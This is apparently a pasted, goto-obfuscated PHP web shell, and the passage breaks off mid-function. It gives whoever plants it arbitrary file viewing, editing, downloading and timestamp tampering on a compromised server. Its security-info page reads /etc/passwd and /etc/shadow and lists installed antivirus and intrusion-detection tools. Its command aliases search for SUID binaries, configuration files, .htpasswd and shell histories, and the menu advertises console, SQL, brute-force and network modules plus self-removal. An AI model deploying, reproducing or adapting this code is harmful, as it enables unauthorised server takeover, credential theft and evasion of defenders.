· 5 years ago · Aug 04, 2020, 12:10 PM
1goto ac6a5; ca12a: function actionFilesTools() { goto d0e04; b0f6b: echo '<br><br>'; goto D6384; Bf8a8: if (!file_exists(@$_POST['p1'])) { goto E157a; E157a: echo 'File not exists'; goto Be643; a9fa2: return; goto cd6f7; Be643: wSfETFooter(); goto a9fa2; cd6f7: } goto D122a; D6384: switch ($_POST['p2']) { case 'view': goto E8792; cda60: echo '</pre>'; goto b2325; F920f: if ($fp) { goto dd875; add76: echo htmlspecialchars(@fread($fp, 1024)); goto A9312; f2089: A8030: goto Fb50e; dd875: f4519: goto b7188; b7188: if (@feof($fp)) { goto A8030; } goto add76; Fb50e: @fclose($fp); goto a730b; A9312: goto f4519; goto f2089; a730b: } goto cda60; bce33: $fp = @fopen($_POST['p1'], 'r'); goto F920f; E8792: echo '<pre class=ml1>'; goto bce33; b2325: goto B78c7; goto F13ad; F13ad: case 'highlight': if (@is_readable($_POST['p1'])) { goto df34e; c9792: $code = @highlight_file($_POST['p1'], true); goto a19da; a19da: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto b23d0; df34e: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto c9792; b23d0: } goto B78c7; case 'chmod': goto A4f50; b9616: clearstatcache(); goto e5bf8; A4f50: if (!empty($_POST['p3'])) { goto A8ada; C015e: if (!($i >= 0)) { goto F3030; } goto e1c0e; Eab45: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto Ef387; A9746: d0b9d: goto C8f64; e1c0e: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto A9746; dd8c1: goto A782c; goto B5d84; A8ada: $perms = 0; goto E7298; C8f64: --$i; goto dd8c1; cdfbc: A782c: goto C015e; B5d84: F3030: goto Eab45; E7298: $i = strlen($_POST['p3']) - 1; goto cdfbc; Ef387: } goto b9616; C95af: goto B78c7; goto A4514; e5bf8: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto C95af; A4514: case 'edit': goto B33a9; Dac8c: goto B78c7; goto F4fe8; Fc16d: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto e315f; B33a9: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto B78c7; } goto b664f; E9929: echo '</textarea><input type=submit value=">>"></form>'; goto Dac8c; b664f: if (!empty($_POST['p3'])) { goto c9082; C57f5: if ($fp) { goto c6ebc; c6ebc: @fwrite($fp, $_POST['p3']); goto e71ea; Bbf14: echo 'Saved!<br><script>p3_="";</script>'; goto C7676; e71ea: @fclose($fp); goto Bbf14; C7676: @touch($_POST['p1'], $time, $time); goto fa3f1; fa3f1: } goto B1324; e940a: $fp = @fopen($_POST['p1'], "w"); goto C57f5; c9082: $time = @filemtime($_POST['p1']); goto c3207; c3207: $_POST['p3'] = substr($_POST['p3'], 1); goto e940a; B1324: } goto Fc16d; Bc5e8: if ($fp) { goto F3a3e; F3a3e: C199a: goto e620e; d76dc: echo htmlspecialchars(@fread($fp, 1024)); goto d5055; d5055: goto C199a; goto d8e1d; e620e: if (@feof($fp)) { goto C0064; } goto d76dc; a3e2c: @fclose($fp); goto D2371; d8e1d: C0064: goto a3e2c; D2371: } goto E9929; e315f: $fp = @fopen($_POST['p1'], 'r'); goto Bc5e8; F4fe8: case 'hexdump': goto F3d72; D3b2c: fc236: goto Bad80; f43c7: if (!($i < $len)) { goto d03d8; } goto a5706; e2180: $h = array('00000000<br>', '', ''); goto E6b34; Ce4b4: if ($n == 32) { goto Cd5c0; Cf537: $h[1] .= '<br>'; goto e2356; e2356: $h[2] .= "\n"; goto C3b49; A15f5: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto Cf537; Cd5c0: $n = 0; goto A15f5; C3b49: } goto F8b84; b208e: ++$i; goto d5dbc; a7621: E83b5: goto D3b2c; d6c66: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto fc236; case 9: $h[2] .= ' '; goto fc236; case 10: $h[2] .= ' '; goto fc236; case 13: $h[2] .= ' '; goto fc236; default: $h[2] .= $c[$i]; goto fc236; } goto a7621; A652a: $i = 0; goto C4252; bc2c9: d03d8: goto B75d7; E6b34: $len = strlen($c); goto A652a; d5dbc: goto fcfe2; goto bc2c9; d4e32: $n = 0; goto e2180; F3d72: $c = @file_get_contents($_POST['p1']); goto d4e32; a5706: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto d6c66; B75d7: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto Dac2d; C4252: fcfe2: goto f43c7; Dac2d: goto B78c7; goto Dd81b; F8b84: F476e: goto b208e; Bad80: $n++; goto Ce4b4; Dd81b: case 'rename': goto A0b03; A0b03: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto c1bc3; c1bc3: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto Ecb22; Ecb22: goto B78c7; goto a1b1a; a1b1a: case 'touch': goto Ee884; f1053: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto C2420; Ee884: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto E6d59; C2420: goto B78c7; goto D9a2e; E6d59: clearstatcache(); goto f1053; D9a2e: } goto bf287; c8392: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wSfETViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wSfETPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto b7fa8; bf287: E2996: goto Fa253; E2cda: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto fe72c; F71b8: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto fe09e; D09ab: $fp = @fopen($_POST['p1'], "r"); goto e2d60; c836d: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto Bd187; Bd187: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto D09ab; e2d60: if ($fp) { goto d2b00; C2980: E7889: goto d24c5; d2b00: F5e32: goto b009d; e51f4: goto F5e32; goto C2980; b009d: if (@feof($fp)) { goto E7889; } goto bb7b7; d24c5: fclose($fp); goto cc04e; bb7b7: echo @fread($fp, 1024); goto e51f4; cc04e: } goto Ae3c4; fe09e: ob_start("ob_gzhandler", 4096); goto c836d; Ae3c4: } exit; } goto E2cda; f0fe6: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto f11b9; Fa253: B78c7: goto Af5ad; b7fa8: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto f0fe6; D122a: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto B47fe; Af5ad: echo '</div>'; goto e22ed; e22ed: wSfETFooter(); goto f9f8a; B47fe: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto c8392; fe72c: wSfETHeader(); goto b158c; f11b9: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto Bac41; b158c: echo '<h1>File tools</h1><div class=content>'; goto Bf8a8; Bac41: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; cd192: } goto Ebd80; d0e04: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto F71b8; Ebd80: a47bd: goto b0f6b; f9f8a: } goto ffee1; E26b5: function wSfETsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto E7738; C4353: function wSfETScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto b7b83; F4c1c: $files[] = $filename; goto B9b04; de182: b7dba: goto d70f1; b7b83: $dh = opendir($dir); goto de182; ae198: E0fde: goto a80b8; a80b8: return $files; goto acad4; d70f1: if (!(false !== ($filename = readdir($dh)))) { goto E0fde; } goto F4c1c; B9b04: goto b7dba; goto ae198; acad4: } } goto f60f4; Eae85: function actionSecInfo() { goto e1809; b588d: echo '<br>'; goto d7bc3; Be428: wSfETSecParam('Open base dir', @ini_get('open_basedir')); goto D9a99; f76c8: echo '</div>'; goto cffc2; A4ff4: $temp = array(); goto Da9c2; A21f9: if (function_exists('apache_get_modules')) { wSfETSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto ebc9a; B73c8: echo '<h1>Server security information</h1><div class=content>'; goto e52ec; Bd5dd: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto eee51; bc89d: wSfETSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto A21f9; fd60a: wSfETSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto B9fd6; cffc2: wSfETFooter(); goto B9509; ebc9a: wSfETSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto Be428; e1809: wSfETHeader(); goto B73c8; d7bc3: if ($GLOBALS['os'] == 'nix') { goto c8b38; c8b38: wSfETSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto Ab5db; D634c: if (!$GLOBALS['safe_mode']) { goto e8b54; b6d32: echo '<br>'; goto Cca44; F2cd8: wSfETSecParam('Downloaders', implode(', ', $temp)); goto c4968; d9fc0: d0338: goto C60ca; f418e: $temp = array(); goto e9d0f; Cca44: $temp = array(); goto b056b; b056b: foreach ($userful as $item) { if (wSfETWhich($item)) { $temp[] = $item; } Bee1d: } goto F651f; dd9dc: $temp = array(); goto ebd49; f94c6: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto c3c73; fefe5: goto B9847; goto E3f2e; dc4e7: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto F11cf; c3c73: $temp = ""; goto F6e01; Dd6fb: wSfETSecParam('Users', $temp); goto cd823; d380d: if (!($_POST['p2'] <= $_POST['p3'])) { goto D86b8; } goto Ff07e; Ff07e: $uid = @posix_getpwuid($_POST['p2']); goto dc4e7; E3f2e: D86b8: goto ce7f0; ce7f0: echo '<br/>'; goto Dd6fb; C616d: $_POST['p2']++; goto fefe5; F11cf: F76ab: goto C616d; F6e01: B9847: goto d380d; cd823: } goto A6d2a; b2eb4: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto c0267; c0267: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto b6d32; c4968: echo '<br/>'; goto F6ac6; ebd49: foreach ($downloaders as $item) { if (wSfETWhich($item)) { $temp[] = $item; } d1ea2: } goto df054; d0015: wSfETSecParam('Userful', implode(', ', $temp)); goto f418e; F6ac6: wSfETSecParam('HDD space', wSfETEx('df -h')); goto a5aae; e8b54: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto b2eb4; df054: F6f28: goto F2cd8; a5aae: wSfETSecParam('Hosts', @file_get_contents('/etc/hosts')); goto a782a; F651f: Bc2b6: goto d0015; e9d0f: foreach ($danger as $item) { if (wSfETWhich($item)) { $temp[] = $item; } Ee0c1: } goto d9fc0; a782a: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto f94c6; C60ca: wSfETSecParam('Danger', implode(', ', $temp)); goto dd9dc; A6d2a: } goto f53fb; Fb226: wSfETSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto D634c; c67a5: wSfETSecParam('OS version', @file_get_contents('/proc/version')); goto Fb226; Ab5db: wSfETSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto c67a5; f53fb: } else { goto Fbef0; b7b4d: wSfETSecParam('Account Settings', wSfETEx('net accounts')); goto F701c; F701c: wSfETSecParam('User Accounts', wSfETEx('net user')); goto b85aa; Fbef0: wSfETSecParam('OS Version', wSfETEx('ver')); goto b7b4d; b85aa: } goto f76c8; B9fd6: wSfETSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto A4ff4; Da9c2: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto Bd5dd; ee29f: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto Ba861; eee51: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto ee29f; Ba861: wSfETSecParam('Supported databases', implode(', ', $temp)); goto b588d; e52ec: function wSfETSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto bc89d; D9a99: wSfETSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto fd60a; B9509: } goto fee0b; F0df5: function wSfETLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto E26b5; edc8f: function wSfETHeader() { goto B5b01; D03b3: $cwd_links = ''; goto Fa7bf; a807e: if (!function_exists('posix_getegid')) { goto bb7ca; Ddd6b: $gid = @getmygid(); goto B834f; c7c94: $uid = @getmyuid(); goto Ddd6b; B834f: $group = "?"; goto C1515; bb7ca: $user = @get_current_user(); goto c7c94; C1515: } else { goto dd698; E9bee: $group = $gid['name']; goto ca462; ee20b: $uid = $uid['uid']; goto E9bee; dd698: $uid = @posix_getpwuid(posix_geteuid()); goto e87be; ca462: $gid = $gid['gid']; goto ab74b; e87be: $gid = @posix_getgrgid(posix_getegid()); goto f3ae9; f3ae9: $user = $uid['name']; goto ee20b; ab74b: } goto D03b3; B9217: $n = count($path); goto Fd859; Da1bb: $kernel = @php_uname('s'); goto C0538; d82f3: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto f18ee; a7954: fa15d: goto d3602; F7873: $j++; goto a26d4; f47e4: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Fc3ec; A4d74: if (!($i < $n - 1)) { goto E4c0d; } goto F451e; b4862: $drives = ""; goto B9157; df87f: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wSfETViewSize($totalSpace) . ' <span>Free:</span> ' . wSfETViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wSfETPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto Fce04; Ea252: eed44: goto Bfc5e; F451e: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto A5571; d9d98: $menu = ''; goto Ff36d; fc8d5: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto dc824; B9157: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } Ddecd: } D0e43: } goto df87f; Bfc5e: if (!($j <= $i)) { goto f58df; } goto ff8a3; ff8a3: $cwd_links .= $path[$j] . '/'; goto A2e83; C5fd6: f58df: goto d82f3; b47b8: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto A61a9; f18ee: b912b: goto Bc427; Aa521: c2594: goto b4862; Bc427: $i++; goto D7709; A2e83: c8d82: goto F7873; ce845: $release = @php_uname('r'); goto Da1bb; Ff36d: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; E0d51: } goto Aa521; A61a9: $opt_charsets = ''; goto f34a2; A5571: $j = 0; goto Ea252; Fd859: $i = 0; goto cc6f6; Fc3ec: $m['Self remove'] = 'SelfRemove'; goto d9d98; C0538: $explink = ''; goto e446b; cc6f6: B34e4: goto A4d74; a26d4: goto eed44; goto C5fd6; ad360: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto a48f4; f34a2: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; b1ba0: } goto a7954; Fa7bf: $path = explode("/", $GLOBALS['cwd']); goto B9217; a48f4: $totalSpace = $totalSpace ? $totalSpace : 1; goto ce845; e446b: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto a807e; Cf319: E4c0d: goto b47b8; dc824: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto ad360; Be8e5: global $color; goto fc8d5; B5b01: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto Be8e5; d3602: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto f47e4; D7709: goto B34e4; goto Cf319; Fce04: } goto Ae684; E2d86: $color = "#df5"; goto fa248; Ca12b: function actionSelfRemove() { goto Ff239; f72c2: wSfETFooter(); goto f63f9; a72f3: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto f72c2; Ff239: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto B1ade; B1ade: if ($_POST['p1'] != 'yes') { wSfETHeader(); } goto a72f3; f63f9: } goto f7cfb; a0cf9: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto c9a61; E6783: $disable_functions = @ini_get('disable_functions'); goto A8263; D33b8: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto edc8f; C996e: function wSfETViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto Bf45b; Acf4d: if (!$safe_mode) { error_reporting(0); } goto E6783; C653b: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto Ffa74; bdf9c: $default_use_ajax = true; goto Ccd2c; B3362: @ini_set('log_errors', 0); goto daf69; A8263: $home_cwd = @getcwd(); goto fcf40; f60f4: function wSfETWhich($p) { goto bacdb; f34aa: if (!empty($path)) { return $path; } goto a19af; bacdb: $path = wSfETEx('which ' . $p); goto f34aa; a19af: return false; goto c0535; c0535: } goto Eae85; Ca950: @ini_set('error_log', NULL); goto B3362; Febb4: function actionStringTools() { goto adb9c; E87ee: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto C4acc; b5cb2: $r .= sprintf('%02X', ord($p[$i])); goto e5696; c7d88: if (!($i < strlen($p))) { goto B1dc8; } goto b5cb2; Cb8a4: B1dc8: goto c56f7; e5696: B699a: goto d4f7e; d82a2: C6e43: goto c7d88; d4f7e: ++$i; goto Bda02; Bda02: goto C6e43; goto Cb8a4; c56f7: return 